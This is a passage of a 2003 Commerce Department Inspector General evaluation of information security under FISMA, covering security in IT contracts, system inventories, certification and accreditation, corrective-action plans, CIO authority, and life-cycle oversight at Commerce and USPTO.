    Nautical Charting System
    Office of Coast Survey Support Hydrographic Support Sys.
  National Weather Service (NWS)
    NOAA Weather Radio
    WSR-88D Weather Radar (NEXRAD)
    Advanced Weather Interactive Processing System
    Kansas City Weather Forecast Office
    Salt Lake City Weather Forecast Office
    Kansas City River Forecast Center
    National Centers for Environmental Prediction
  Office of Oceanic and Atmospheric Research (OAR)
    Office of Global Programs
    NOAA Profiler Network Central Facility
    Space Environment Center
    Boulder Campus Network

*Review of IT Controls to Support the FY 2002 Consolidated Financial Statement Audit

FINDINGS

Information security in IT service contracts. (OMB Question A.2.b-e)

I. Information Security in IT Service Contracts Is Improving, but Additional Efforts Are Needed

In fiscal year 2002, Commerce’s IT expenditures totaled nearly $500 million (43 percent of all its contract obligations). More than two-thirds of that amount (approximately $334 million) was for IT services. In the absence of rigorous security provisions in contract documents, this heavy reliance on contractor services leaves Commerce systems and data highly vulnerable to security violations.

In support of our FY 2002 independent evaluation, we reviewed 40 contracts12 awarded by several operating units including USPTO. Across the board, we found the contracts had either insufficient security provisions or none at all, and we concluded that federal and departmental policy and guidance for incorporating such provisions were lacking.

In the intervening year, the Department issued a new information security policy, which emphasizes that IT security officers, system owners,13 contracting offices, and contracting officers’ technical representatives (COTRs) must work together to ensure that information security is addressed throughout the acquisition process, and provides guidance on monitoring contractors who have access to departmental systems and data.
To support these requirements, the CIO Office, the Office of Acquisition Management (OAM), and the Office of Human Resources Management (OHRM) have developed a security training module for procurement professionals, which is undergoing departmental review. In an April 2003 amendment to a policy memorandum, OAM reemphasized the need for including information security provisions in contracts.

OAM has also drafted a standard contract provision for safeguarding the security of unclassified systems and information, which is also undergoing department review.14 The provision requires, among other things, a system security plan and certification and accreditation for contracted IT resources/services that involve connection to Commerce networks or storage of Commerce data on contractor-owned systems. OAM’s assessment of current contracts and solicitations identified more than 300 needing modification to incorporate appropriate security provisions. However, OAM is not planning to advise contracting officers to modify the deficient contracts until the draft provision is issued in final. With no date for issue set, we are concerned by the absence of interim action to mitigate security risks posed by these contracts.

12 The term “contract” includes task orders and delivery orders issued under multiple award contracts and government-wide agency contracts (GWACs).

13 The Department’s information security policy defines a system owner as a project manager with day-to-day management and operational control over the system and direct oversight of the system/network administrators and operations staff.

14 Similarly, the Civilian Agency Acquisition Council is working on a draft change to the Federal Acquisition Regulation that would ensure that information security is included in IT acquisitions, but the timeframe for its completion is unclear.

Although a formal provision has not been completed, our FY 2003 independent evaluation did note some progress in incorporating security into IT service contracts. Our review of 24 contracts awarded during this fiscal year by the Office of the Secretary, NOAA Headquarters, NIST, Census, and USPTO found that contract documents contained at least minimal provisions for security.
Contracts typically require risk and suitability assessments and background clearances for contractors working in government facilities; and some require contractors to attend security awareness training and follow information security procedures.

However, we found only two contracts that contained most of the elements of the draft provision. In addition, we found little evidence of appropriate review of contractor compliance with security requirements, or of contracting staff working with COTRs and information security offices—as mandated in the Department’s new policy—to ensure that security is addressed during development of contract requirements and statements of work. We believe the general absence of such provisions and the inadequate interface among all staff involved in the contracting/IT security process continue to place Commerce systems and data at risk.

Contracts should improve once OAM’s standard provision is finalized and contracting staff are trained to use it. However, it is essential that communication improve among contracting, technical, and information security staffs when planning, executing, and administering contracts that include IT services. These personnel have significant management and oversight responsibility, and they must work as a team to ensure that security is adequately addressed in contract planning and development of requirements and performance measures, so that contractor accountability may be established. They must also work together to assess contractor compliance with security requirements, and document contract files accordingly.

Agency’s work to develop an inventory of major IT systems. (OMB Question A.2.f)

II. The Department Is Continuing to Refine Its Systems Inventory

In January 2003, the Department issued an updated and expanded information security policy that provides comprehensive requirements and direction for the operating units in conducting their own information security programs. The Department views system inventory control as the foundation for managing the information security program, and the policy requires all operating units to maintain a comprehensive inventory of classified and unclassified IT systems that provides security information (including dates for the most recent risk assessment, security plan approval, contingency plan and related testing, certification and accreditation, and self-assessment). It also must include the dates of audits performed by external entities such as OIG, the General Accounting Office (GAO), or the Department within the previous 12 months. All operating units including USPTO must provide a copy of their inventory to the Department’s IT security program manager twice a year.

Commerce’s CIO Office is reviewing the inventory data as part of its compliance review program, which is designed to validate the security information reported by operating units and assess the effectiveness of their information security programs. This year’s inventory review is focusing on whether operating units are properly applying NIST criteria in defining system boundaries. (The Department’s intent is to review information security for all systems over a 3-year cycle.)
To streamline information security management, particularly the certification and accreditation process, some operating units have reassessed system boundaries and redefined systems, thereby significantly reducing their inventories. For example, in FY 2002, the Department reported that Census had 82 systems; the March 2003 system inventory identifies only 8 Census systems. While it is appropriate to define systems in a way that facilitates their administration, it is important that the definitions be logical and meaningful and that Department and operating unit management have sufficient information about the number and type of IT assets in the organization.

Material weaknesses. (OMB Question A.3)

III. The Department Should Continue to Report Information Security as a Material Weakness

FISMA requires that significant deficiencies in information security policy, procedures, or practices be reported as material weaknesses. OMB Circular A-130 instructs agencies to identify security deficiencies pursuant to OMB Circular A-123, “Management Accountability and Control,” if it is determined that there is no assignment of security responsibility, no security plan, or no accreditation. The agency’s decision to report a material weakness should depend on the risk and magnitude of harm posed by the weakness. For the past 2 fiscal years, the Department reported information security as a material weakness in its Accountability Report. In our independent evaluation last year, we stated that the Department should continue to report information security as a material weakness until all systems that are national critical (part of the critical infrastructure) and mission critical have been certified and accredited. The Department established a goal of certifying and accrediting these systems by the end of FY 2003.

As discussed in Finding XI, in this year’s evaluation we found that numerous systems reported as certified and accredited have significant deficiencies in their certification and accreditation materials. For example, we found risk assessments and security plans that have no basis for determining appropriate security controls; identify sensitivity levels that are not commensurate with the requirements for confidentiality, integrity, and availability of the information handled; and do not fully and accurately describe the system environment and interconnections. In most cases, there was no evidence that security controls had been tested. We also found systems that had either no contingency plans or whose plans specified no measures for recovering IT services following an emergency or system disruption. Few contingency plans had evidence of testing. These problems call into question the effectiveness of the certification and accreditation processes being used.

The Department’s new policy requires compliance with the National Information Assurance Certification and Accreditation Process (NIACAP), which establishes minimum certification and accreditation standards.
The operating units are currently working to improve the content and\nquality of their certification and accreditation processes and materials to comply with NIACAP,\nand some units are attempting to rework existing certifications and accreditations by September\n30, including some that we reviewed.15\n\nGiven the shortcomings in the systems we evaluated, however, we do not believe that\ncertification and accreditation of the Department\xe2\x80\x99s roughly 340 national-critical and mission-\ncritical systems16\xe2\x80\x94of sufficient quality and content\xe2\x80\x94can be completed by the end of the fiscal\nyear. Thus, while the Department should be commended for its focused efforts to certify and\naccredit, we believe that information security should be reported as a material weakness for\nFY 2003. We have worked closely with the Department CIO on information security concerns\nthroughout the year, and he has indicated agreement with our conclusion.\n\n15\n     We obtained certification and accreditation materials from the operating units in June and July 2003.\n16\n     The number of systems is based on the Department\xe2\x80\x99s March 2003 system inventory.\n\n                                                            7\n\n\x0cU.S. Department of Commerce                                         Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                            September 2003\n\n\n\nUSPTO\nAs noted earlier, USPTO submits its Accountability Report separate from the rest of the\nDepartment. Last year we found that the agency lacked current certifications and accreditations\nfor its systems and suggested that it report information security as a material weakness until its\nmission-critical systems are certified and accredited. (USPTO has no systems designated as\nnational critical). USPTO reported information security as a material weakness in its FY 2002\nAccountability Report. 
In response to last year\xe2\x80\x99s evaluation, the agency indicated that it would\nrank its systems by risk and criticality, and certify and accredit all high-risk systems by the end\nof FY 2003, and the balance by the end of FY 2004.\n\nThe agency subsequently revised its systems inventory by consolidating more than 100 systems\ninto 19 systems, 9 mission critical and the remainder business essential. It planned to have its 9\nmission-critical systems and 1 classified system certified and accredited by the end of FY 2003.\nAs of mid-September, all 10 systems had undergone certification testing, 5 had been granted\ninterim accreditations, and 1 had received final accreditation. USPTO expects to grant the\nremaining 4 systems 120-day interim accreditations by the end of the fiscal year. USPTO is\nemploying a sound certification and accreditation process that includes rigorous testing of\nsecurity controls. Interim accreditations are not granted without comprehensive security plans,\ntesting, and risk assessments, with final accreditations given after problems identified in\ncertification testing have been corrected.\n\nAs discussed in Finding XI, our review of USPTO\xe2\x80\x99s certification and accreditation materials\ndemonstrates that it has made an extremely conscientious effort to employ a disciplined process\naccording to the NIACAP standard, including rigorous testing of security controls. And this\nprocess has been effective: it has identified numerous risks that must be addressed before all\nsystems receive full accreditation. We reported in last year\xe2\x80\x99s evaluation that the Director of\nUSPTO has made a commitment to protect the bureau\xe2\x80\x99s information assets; the certification and\naccreditation program, under the leadership of USPTO\xe2\x80\x99s CIO, confirms this commitment. 
But because of the risks identified and the lack of final accreditations, we believe that USPTO should report information security as a material weakness for FY 2003.

IV. The Department Has Established a Sound Plan of Action and Milestone (POA&M) Process

(OMB Question A.4: Agencywide plan of action and milestone process.)

FISMA requires each agency to develop, document, and implement an information security program that includes a remedial process for addressing any deficiencies in its information security policies, procedures, and practices. OMB guidance states that agency program officials must develop, implement, and manage corrective action plans, referred to as POA&Ms, for all systems that support their operations and assets. It also states that CIOs must develop, implement, and manage corrective action plans for all programs and systems they operate and control.

The requirements for POA&Ms are specified in the Department’s new information security policy and are responsive to the criteria contained in OMB’s FY 2003 FISMA guidance. The Department develops, implements, and manages POA&Ms for all of its systems that have identified security weaknesses. System owners are required to prepare the POA&Ms for their systems, and the operating unit IT security officer prepares the POA&M for the unit’s program. Operating units are required to submit their POA&Ms, including the status of corrective actions, to the Department CIO Office monthly.

The Department monitors POA&Ms closely and uses them to manage corrective actions for all identified weaknesses. Our reviews at Census, ITA, NIST, and NOAA indicate that POA&Ms in these operating units are being implemented in accordance with the Department’s guidance. OIG has access to all POA&Ms, but because many are based primarily on self-assessments, which may not identify all weaknesses, we place greater reliance on independent reviews for identifying weaknesses. Commerce’s POA&M database does not include the accounting codes associated with each line of the IT budget request, and IT system and budget reviews do not formally take into account the content of the POA&Ms, although attention is given to information security in these reviews. Commerce plans to tie POA&Ms to the system budget request in FY 2004. Our evaluation of Commerce’s process against OMB’s criteria is presented in table 2.

USPTO

Like the Department, USPTO develops, implements, and manages POA&Ms for systems that have identified security weaknesses. The agency’s CIO Office develops the POA&Ms, collaborating with program officials to ensure that information security weaknesses are addressed. The CIO closely monitors the POA&Ms and uses them to manage corrective actions for identified weaknesses. OIG has access to all POA&Ms, but relies more heavily on independent reviews. To satisfy OMB’s guidance, program officials at USPTO need to have primary responsibility for the POA&Ms for systems that support their operations.
USPTO has been submitting its POA&Ms directly to OMB; beginning in FY 2004, it will submit them to the Department CIO Office for incorporation into Commerce’s consolidated report to OMB. Table 3 presents our evaluation of USPTO’s process against OMB’s criteria.

Table 2: Evaluation of Department’s POA&M Process

(Each entry gives the OMB FISMA criterion, whether the criterion was met (Y/N), and the OIG evaluation.)

Criterion: Agency program officials develop, implement, and manage POA&Ms for every system under their responsibility with noted IT security weaknesses.
Met: Y
OIG evaluation: Program officials must record in POA&Ms any deficiencies found through an external review, internal self-assessment, or compliance review, and must track corrections to completion.

Criterion: Agency program officials report at least quarterly to the CIO on their remediation progress.
Met: Y
OIG evaluation: Reporting is monthly.

Criterion: Agency CIO develops, implements, and manages POA&Ms for every system under their responsibility with noted IT security weaknesses.
Met: Y
OIG evaluation: Operating unit CIOs must record in POA&Ms any deficiencies found through an external review, internal self-assessment, or compliance review, and must track corrections to completion.

Criterion: The agency CIO centrally tracks and maintains all POA&M activities on at least a quarterly basis.
Met: Y
OIG evaluation: The Department CIO centrally tracks and maintains all POA&M activities on a monthly basis.

Criterion: The POA&M is the authoritative agency and IG management tool to identify and monitor agency actions for correcting information and IT security weaknesses.
Met: Y
OIG evaluation: The POA&Ms contain all known security weaknesses, are closely monitored by the Department, and are used to manage corrective actions. Because many POA&Ms are based primarily on self-assessments, which may not identify all weaknesses, OIG places greater reliance on independent reviews for identifying weaknesses.

Criterion: System-level POA&Ms are tied directly to the system budget request through the IT business case as required in OMB budget guidance (Circular A-11) so as to justify IT security funds in the budget process.
Met: N
OIG evaluation: The Department plans to ensure that POA&Ms are tied to the system budget request in FY 2004, but does not do so currently.

Criterion: Agency IGs are an integral part of the POA&M process and have access to agency POA&Ms.
Met: Y
OIG evaluation: All weaknesses identified by OIG are included in corrective action plans. OIG has access to all POA&Ms.

Criterion: The agency’s POA&M process prioritizes agency IT security weaknesses to ensure that significant weaknesses are addressed in a timely manner and receive, where necessary, appropriate resources.
Met: Y
OIG evaluation: A formal prioritization process does not exist. However, reviews of POA&Ms at the operating unit and Department level appear to ensure that significant weaknesses are addressed in a timely manner.

Table 3: Evaluation of USPTO’s POA&M Process

(Each entry gives the OMB FISMA criterion, whether the criterion was met (Y/N), and the OIG evaluation.)

Criterion: Agency program officials develop, implement, and manage POA&Ms for every system under their responsibility with noted IT security weaknesses.
Met: N
OIG evaluation: All weaknesses found through an external review, internal self-assessment, or compliance review are recorded in POA&Ms. However, program officials do not develop the POA&Ms. Rather, they are developed by the CIO Office, in collaboration with program officials.

Criterion: Agency program officials report at least quarterly to the CIO on their remediation progress.
Met: Y
OIG evaluation: USPTO’s CIO works collaboratively with program officials to track remediation progress. Reporting is quarterly.

Criterion: Agency CIO develops, implements, and manages POA&Ms for every system under their responsibility with noted IT security weaknesses.
Met: Y
OIG evaluation: USPTO’s CIO records in a POA&M any deficiencies found through an external review, internal self-assessment, or compliance review.

Criterion: The agency CIO centrally tracks and maintains all POA&M activities on at least a quarterly basis.
Met: Y
OIG evaluation: USPTO’s CIO centrally tracks and maintains all POA&M activities quarterly.

Criterion: The POA&M is the authoritative agency and IG management tool for identifying and monitoring agency actions to correct information and IT security weaknesses.
Met: Y
OIG evaluation: The POA&Ms contain all known security weaknesses, are closely monitored by USPTO, and are used to manage corrective actions. Because many POA&Ms are based primarily on self-assessments, which may not identify all weaknesses, OIG places greater reliance on independent reviews for identifying weaknesses.

Criterion: System-level POA&Ms are tied directly to the system budget request through the IT business case as required in OMB budget guidance (Circular A-11) to tie the justification for IT security funds to the budget process.
Met: Y
OIG evaluation: As of its September 2003 submission, USPTO’s POA&Ms have unique identifiers that link them to the appropriate system budget request.

Criterion: Agency IGs are an integral part of the POA&M process and have access to agency POA&Ms.
Met: Y
OIG evaluation: All weaknesses identified by OIG are included in USPTO’s corrective action plans. OIG has access to all POA&Ms.

Criterion: The agency’s POA&M process represents a prioritization of agency IT security weaknesses that ensures that significant IT security weaknesses are addressed in a timely manner and receive, where necessary, appropriate resources.
Met: Y
OIG evaluation: USPTO’s CIO reviews the POA&Ms monthly to track progress and determine priorities.

V. Responsibilities and Authorities Are Clearly Specified for the Department CIO and Operating Unit Officials

(OMB Question B.1, Responsibilities of Agency Head: Steps taken by the agency head to clearly and unambiguously set forth FISMA’s responsibilities and authorities for the agency CIO and program officials, and actions to implement and enforce these steps.)

The responsibilities and authorities for the Department’s CIO and program officials have been clearly specified in the new information security policy. This policy is part of the Department’s Information Technology Management Handbook, which details and clarifies the CIO’s authorities set forth in Department Organization Order (DOO) 15-23, “Chief Information Officer.” It was through this order that the Secretary delegated to the CIO responsibility for developing and implementing a departmental information security program to ensure the confidentiality, integrity, and availability of IT resources. The handbook is itself a DAO and is thus the authority for policies and regulations regarding IT resource management throughout Commerce.

Department CIO. The new policy makes the Department’s CIO responsible for overseeing Commerce’s information security program; ensuring an appropriate level of protection for all departmental information resources; issuing policy and guidance that establish a framework for an information security program for the Department and its operating units; ensuring that funding and resources are committed for the program’s staffing, training, and support and for implementing system safeguards; and monitoring, evaluating, and reporting to the Deputy Secretary on the status of information security within the Department.

FISMA requires agency heads to delegate to their CIO the authority for ensuring compliance with the Act. In a recent decision memorandum, the Secretary explicitly delegated the requisite authorities to the Commerce CIO. The specific authorities are that the CIO (1) designate a senior agency information security officer; (2) develop and maintain an agencywide information security program; (3) develop and maintain information security policies, procedures, and control techniques; (4) train and oversee personnel with significant responsibilities for information security; and (5) provide assistance to senior agency officials concerning their information security responsibilities.

Operating unit heads. The policy gives operating unit heads explicit responsibility for their unit’s information security. Unit heads are required to communicate to all employees the importance of information security to the unit’s and Department’s mission; assign management of IT systems to responsible program officials (e.g., heads of line offices and major operating unit components); ensure that the operating unit has an established information security program to protect its systems; and serve as the designated approving authority (DAA)17 for systems that support the operating unit’s mission. (DAA authority may be delegated to a program official.)

17 The DAA is the official with the authority to accredit systems, i.e., formally assume responsibility for operating a system at an acceptable level of risk.

Program officials. The policy charges program officials (members of an operating unit’s top-level management team, e.g., heads of line offices and directors of major operating unit components) with ensuring implementation of an effective information security program for the systems they oversee; assigning responsibility for daily system operations and security to system owners; serving as the DAA, when so designated by the unit head, for systems that support the operating unit’s mission; and ensuring availability of adequate resources for implementing IT security activities.

The Commerce-wide information security program, which is overseen by the Department’s CIO, provides the foundation for enforcing unit responsibilities and authorities. This program requires each operating unit to have its own information security program and documented policy that conform to departmental policy. The Department CIO’s responsibilities and authorities are, in turn, enforced through his reporting on information security to the Deputy Secretary.

As we have noted in our previous independent evaluations, the Secretary issued an information security memorandum in July 2001 to secretarial officers and heads of operating units, in which he gave greater specificity to these officials’ responsibilities and charged them with assuring compliance with information security directives.
The memorandum stated that information\nsecurity should be given high priority and sufficient resources and that secretarial officers and\nunit heads are expected to personally invest the time needed to achieve and maintain full\ncompliance with information security improvement directives coming from the Department\xe2\x80\x99s\nnewly developed IT management restructuring plan. This plan was designed to enhance the\nauthority and effectiveness of operating unit CIOs. One of its provisions was that unit heads (or\ntheir designee) must establish CIO performance plans and evaluate this official\xe2\x80\x99s performance in\nconsultation with the Department CIO. This requirement further helps ensure that information\nsecurity receives the requisite attention.\n\nAt the end of last fiscal year, the Deputy Secretary highlighted to operating unit heads the\ninformation security improvements needed in their organizations: accompanied by the CIO and\nchief financial officer (CFO), the Deputy Secretary reviewed unit heads\xe2\x80\x99 progress toward\nmeeting the President's Management Agenda, addressing information security and related\nweaknesses in light of the agenda\xe2\x80\x99s E-Gov component.\n\nOver the past 2 years, the Deputy Secretary has reinforced the Secretary\xe2\x80\x99s emphasis on\ninformation security, and provided the Department CIO with strong support for its improvement.\nIndeed, we believe the progress made by Commerce in information security is attributable not\nonly to the formal authority granted to the CIO position and the vigorous efforts made by the\nDepartment CIO, but also to the Deputy Secretary\xe2\x80\x99s support, which has significantly enhanced\nthe CIO\xe2\x80\x99s effectiveness. 
Simply stated, operating unit heads understand that information security\nis a priority for the Deputy Secretary and that they need to be responsive to issues raised by the\nDepartment CIO.\n\nIn addition, corrective actions at NIST demonstrate that operating unit heads are better\nrecognizing their new responsibilities. Last year we performed an in-depth review of NIST\xe2\x80\x99s\ninformation security program, which identified numerous weaknesses. In response to our\nfindings, the NIST director took significant improvement actions. This year, we found that NIST\n\n\n                                               13\n\n\x0cU.S. Department of Commerce                                         Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                            September 2003\n\n\n\nhas made excellent progress in responding to our concerns and improving its information\nsecurity program. As we recommended, NIST has established a CIO organization and appointed\na full-time CIO; is improving its information security policies, including its policy for\ncertification and accreditation; has refined its systems inventory; is working to track\ncollaborators and researchers who are not on NIST campuses but who use NIST computing\nresources; and is implementing a capital planning and investment control process for IT.\n\nUSPTO\n\nThe responsibilities and authorities for USPTO\xe2\x80\x99s CIO and program officials are delineated in\nAgency Administrative Order 212-4, Information Technology Security, as are the responsibilities\nfor the CIO Office to ensure the policy is implemented and enforced. 
At the time of our\nfieldwork, this policy was in draft, but was expected to be finalized by the end of the fiscal year.\nThe draft policy addresses FISMA\xe2\x80\x99s requirement that heads of agencies accord the CIO the\nauthority to ensure compliance with the Act by stating that the USPTO Director has delegated\nresponsibility for all information security policies to the USPTO CIO. Currently, the CIO is\nworking with senior program officials to ensure they understand their responsibilities for\ninformation security and to address any related concerns they may have. In the meantime, the\npolicy is being refined to ensure that roles and responsibilities are clear and that its provisions\ncomply with OMB Circular A-130 and FISMA.\n\nIn our independent evaluation last year, we reported that USPTO had long-standing information\nsecurity weaknesses requiring senior management attention. The agency\xe2\x80\x99s CIO had been in\nplace a short period of time when we began our work. After we brought our concerns to his\nattention, he and the agency\xe2\x80\x99s director began a concerted effort to improve the information\nsecurity program, including devoting more resources to it and working to upgrade policy,\ncontrols, and oversight. The results of their effort are evident in a considerably enhanced\nprogram.\n\n\n\n\n                                                14\n\n\x0cU.S. Department of Commerce                                           Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                              September 2003\n\n\n\n\nVI. 
\t Significant IT Investments Require CIO\n                                                                     Authority for IT\n      Concurrence                                                    investment decisions.\n                                                                     (OMB Question B.2)\nNo operating unit can make a major IT investment without the\nDepartment CIO\xe2\x80\x99s review and concurrence. The Commerce\nInformation Technology Review Board (CITRB), cochaired\nby the CIO and CFO, was established to support IT investment decision making. The\nDepartment CIO, with input from the board, recommends to the Secretary and Deputy Secretary,\nthrough the Office of Budget, whether a proposed IT project should be funded. His FY 2005\nbudget guidance to operating unit CIOs emphasized that effective information security remains\nan important factor in the board\xe2\x80\x99s consideration of budget requests and provided the criteria\nagainst which the board evaluates a request\xe2\x80\x99s information security content.\n\nThe board evaluates new and ongoing IT investments designated by the Department\xe2\x80\x99s CIO.\nSystems are designated for review if they merit special attention due to their sensitivity, mission\ncriticality, or risk; if their resources are shared among operating units; or if their life cycle cost\nexceeds $25 million. The board must also review IT projects costing more than $10 million and\nrequiring a contract, as well as selected smaller projects, before the acquiring operating unit can\nreceive authority to make a contractual commitment. According to the CIO, greater emphasis is\nbeing placed on information security in contracts in these reviews. 
The board periodically\nreviews the status of approved projects, and the CIO, in turn, uses the results of these reviews to\nrecommend whether a project should be continued, modified, or terminated.\n\nOther IT initiatives that meet certain thresholds must prepare capital asset plans (Exhibit 300)\nsubject to the Department CIO\xe2\x80\x99s approval, but do not necessarily go before the board. For\noperating units without approved strategic and operational IT plans, this threshold is $500,000 in\nlife-cycle costs. Operating units and NOAA line offices with approved plans have a threshold of\n$10 million, and the threshold for NOAA line offices without approved plans is $2.5 million.\nAll other significant projects must be approved by the operating unit CIO.\n\nUSPTO\n\nIn July 2003, USPTO\xe2\x80\x99s CIO issued a draft IT capital planning and investment control process\nguide to provide a structured, integrated process for managing IT investments. The planning and\ncontrol process is intended to ensure that all IT investments align with the agency\xe2\x80\x99s mission and\nstrategic plan, and support business needs while minimizing risks and maximizing returns\nthroughout the investment\xe2\x80\x99s life cycle. A management council consisting of USPTO senior\nexecutives, including the CIO, reviews and approves the agency\xe2\x80\x99s budget, including IT\ninvestments. The council also must approve all new initiatives, including IT investments, having\na life-cycle cost greater than $100,000. Only those IT investments with which the agency CIO\nconcurs are brought before the council.\n\n\n\n\n                                                  15\n\n\x0cU.S. Department of Commerce                                                          Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                             September 2003\n\n\n\n                                                                VII. 
Steps for Managing Life Cycle\n      Agency head\xe2\x80\x99s efforts to ensure that\n      the information security plan is                               Information Security Are Prescribed in\n      practiced throughout the life cycle of                         the Department\xe2\x80\x99s Policy\n      each system. Specific and direct\n      actions taken by the agency head to                      The Department\xe2\x80\x99s new information security\n      verify that the unit\xe2\x80\x99s program officials\n                                                               policy delineates the requirements for managing\n      and CIO are ensuring that security\n      plans are up-to-date and practiced                       information security throughout the life cycle of\n      throughout the life cycle of each                        each system.\n      system. (OMB Questions B.3 and B.4)\n                                                  The policy identifies five life-cycle phases:\n                                                  (1) initiation, (2) development/acquisition,\n(3) implementation, (4) operation and maintenance, and (5) disposal. Specific information\nsecurity requirements must be met at each phase and are the responsibility of the system owner,\nwith support from the appropriate IT security officer and CIO. Commerce has management and\noversight processes to help ensure that life-cycle information security requirements are adhered\nto at phases 1 through 4, but lacks such an oversight process for phase 5\xe2\x80\x94disposal. (See table 4.)\n\nIn the initiation phase, Commerce requires system owners to (1) obtain identifiers from the\nDepartment CIO that permits systems tracking in the Department-wide inventory, and\n(2) determine the sensitivity level18 of the data processed by the system and the criticality of the\nsystem to the Department\xe2\x80\x99s mission. 
Responsibilities in the development/acquisition stage\ninclude determining system security requirements; performing a risk assessment; preparing the\nsecurity plan, contingency plan, and test plan; and ensuring security in IT acquisitions. During\nimplementation, certification and accreditation must occur before the system becomes\noperational. In the operation and maintenance phase, the system owner must ensure that the\nsecurity plan is maintained, the contingency plan is updated and tested, vulnerability testing is\nperformed, configuration management is carried out, security controls are periodically assessed,\nsystem logs are examined, and the system is recertified and reaccredited every 3 years. In the\ndisposal phase, the system owner must see that federal records are properly preserved and\narchived, sensitive information is removed, and system components are destroyed or recycled\nappropriately.\n\nUSPTO\n\nUSPTO\xe2\x80\x99s draft policy states that information security is managed throughout a system\xe2\x80\x99s life\ncycle, gives this responsibility primarily to system owners and secondarily to developers, and\nidentifies 6 life-cycle phases: (1) initiation, (2) concept, (3) detailed analysis and design,\n(4) development, (5) deployment, and (6) operations (including disposal). The draft policy does\nnot identify or describe the requirements of each phase, but instead refers for guidance to\nUSPTO\xe2\x80\x99s Life Cycle Management Manual (LCM) and Life Cycle Certification and Accreditation\nChecklist TSG. 19 Both of these documents would be improved by a concise description of life-\ncycle responsibilities so that program officials and system owners clearly understand their life\ncycle information security duties and responsibilities. 
Such clarification would also facilitate oversight. USPTO’s CIO recognizes that the LCM needs to be streamlined and plans to see that it is next fiscal year.

[18] Sensitivity levels define the requirements for system confidentiality, integrity, and availability.
[19] A TSG is a technical standard or guideline.

Table 4. Departmental Management and Oversight Processes That Promote System Life Cycle Information Security

Initiation
  Principal management or oversight processes:
    • Inventory identifier request
    • CITRB reviews
    • Evaluations by operating unit IT review boards
    • Department and agency CIO reviews of capital asset plans
  Areas addressed by management and oversight processes:
    • Tracking of system security status.
    • Whether (a) information security is being planned and funded as part of the system architecture, (b) risks are well managed, and (c) privacy and confidentiality are being protected.

Development/Acquisition
  Principal management or oversight processes:
    • CITRB reviews
    • Evaluations by operating unit IT review boards
    • Department and agency CIO reviews of capital asset plans
  Areas addressed by management and oversight processes:
    • Whether (a) information security is being implemented and funded appropriately, (b) risks are well managed, and (c) privacy and confidentiality are being protected.

Implementation
  Principal management or oversight processes:
    • Certification and accreditation
    • CIO’s compliance review program
  Areas addressed by management and oversight processes:
    • Whether system security safeguards have been implemented and meet applicable requirements and specifications.
    • Whether the appropriate management official has formally authorized system operation and has explicitly accepted any residual risk.

Operation and Maintenance
  Principal management or oversight processes:
    • Recertification and reaccreditation at least every 3 years
    • CIO’s compliance review program
  Areas addressed by management and oversight processes:
    • Whether system security safeguards are current and continue to meet applicable requirements and specifications.
    • Whether the appropriate management official has formally reauthorized system operation and has explicitly accepted any residual risk.

Disposal
  Principal management or oversight processes:
    • None. Disposal requirements are contained in the Department’s information security policy and security manual, but oversight processes are not identified.

This past year’s certification testing has identified various areas throughout the system life cycle in which policies, procedures, and processes need to be improved. The contractor supporting the certification and accreditation program has been tasked to draft improvements to USPTO’s technical standards and guidelines to accomplish this. This work is expected to be performed early next fiscal year.

To help ensure that security policies and procedures are followed through the life cycle of each system, the draft policy gives the director of the IT Security Program Office responsibility for managing reviews and inspections that examine (1) effectiveness of security control measures; (2) compliance with policies, procedures, standards, and guidelines; and (3) the user community’s awareness of security and related policies.
The draft policy provides guidelines for settling policy violations, and its requirements for certification and accreditation help ensure appropriate life cycle system security management.

Another enforcement action taken by USPTO’s CIO has been to designate an employee in the CIO’s Office to act as an internal IT auditor. This employee reports to the Deputy CIO and is charged with performing such tasks as security documentation review and unannounced penetration testing of USPTO’s networks and systems. In addition, the IT Security Program Office director, through USPTO’s change control board, reviews proposed system changes and has the authority to reject change requests that would adversely affect information security. Finally, a technical review board appointed by the CIO reviews systems and associated information security concerns at key milestones.

VIII. Information Security and Critical Infrastructure Protection Responsibilities Are Well Integrated, and Coordination With Other Security Functions Is Increasing

    OMB Questions B.5 and B.6: Integration of information security program with critical infrastructure protection responsibilities and other security programs (e.g., continuity of operations, and physical and operational security), including efforts to eliminate unnecessary overhead costs and ensure that policies and procedures are consistent and complementary across programs and disciplines.

Commerce’s critical infrastructure and information security programs are under the authority of the Department CIO and are highly integrated. The program manager for critical infrastructure protection (CIP) has responsibilities that require close coordination with the program manager for information security, such as responsibility for computer incident response capability (in concert with the Department’s Office of Security and OIG). In turn, the IT security manager gives priority to systems considered national critical in compliance reviews of information security. These two program managers cochair the IT Security Coordinating Committee, a forum for information exchange and action on Department-wide security policies, problems, and potential solutions.
A pending reorganization of the Department CIO Office will put the IT security and CIP managers under the same senior executive, and thus further solidify their partnership and interface.

Because Commerce has complied with the Clinger-Cohen Act requirement that the CIO report to the agency head and have IT as his primary responsibility, the Department necessarily has separate staffs to carry out other security functions. These functions (continuity of operations planning, physical security, and personnel security) come under the authority of the CFO. The Department’s information security policy delineates partnerships that must be maintained by the CIO Office with offices under the CFO, including the Office of Security (OSY), OHRM, and OAM.

The CIO is currently working with these offices to ensure that IT personnel have appropriate suitability checks and background investigations before they are given access to Commerce systems, and to require that positions for network and system administrators, system developers, and information security program personnel, such as IT security officers and IT security managers, are designated as high risk. The CIO is responsible for the IT component of the continuity of operations plan, and thus works on the plan with the CFO’s office. At present, emphasis is on ensuring there are backup sites for the Office of the Secretary and that the IT backup is tested.
The Department CIO reports that the IT portions of the operating units’ continuity of operations plans have been maturing, and he intends to review them in FY 2004.

As we have reported previously, the CIO Office, OSY, and OIG entered into a memorandum of agreement (MOA) in FY 2001 to define their respective roles and responsibilities relating to the development, implementation, and management of Commerce’s information security program. This agreement was intended to promote a partnership among the three offices that both guarantees complete coverage of information security matters and prevents wasteful duplication of effort. However, the MOA was scheduled to expire in November 2002, with the sunset of GISRA. These offices plan to modify the MOA and renew it in FY 2004.

USPTO

The agency’s draft policy addresses coordination and cooperation between information security and other security programs. The director of the CIO’s IT Security Program Office is responsible for coordinating matters of physical security for IT resources with the USPTO physical security office. USPTO’s Office of Human Resources must inform new employees about the agency’s information security practices, assist managers with disciplinary actions for policy violations, and notify the CIO Office of new and departing employees for account management purposes. The CIO Office works with the physical security office on the information security portion of USPTO’s continuity of operations plan.

IX. National- and Mission-Critical Asset Identification Efforts Continue to Be Refined

